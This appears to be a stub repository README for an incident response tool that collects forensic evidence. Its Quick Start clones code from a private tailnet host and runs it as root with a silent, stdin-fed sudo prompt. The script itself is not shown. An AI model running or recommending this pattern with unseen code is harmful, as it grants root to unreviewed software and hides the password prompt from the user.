main
GreySec Incident Response Pipeline
Automated incident response forensic collection and evidence management.
Structure
forensic-collection/- Live response scripts and evidence collection toolschain-of-custody/- Chain of custody tracking templates and automationevidence-processing/- Evidence processing and analysis workflowsir-playbooks/- Incident response playbooks by phasedocumentation/- IR procedures and runbooks
Quick Start
# Clone the repository
git clone https://gsfiles.tail57cd.ts.net/greysec/ir-pipeline.git
# Run forensic collection (requires sudo)
sudo -S -p '' python3 forensic-collection/scripts/live_response.py --output ./evidence/
Integration
Connects to GreySec's Supabase IR case tracking via ir_cases table.
See: https://greysec.supabase.co
test push
Description
Languages
Python
100%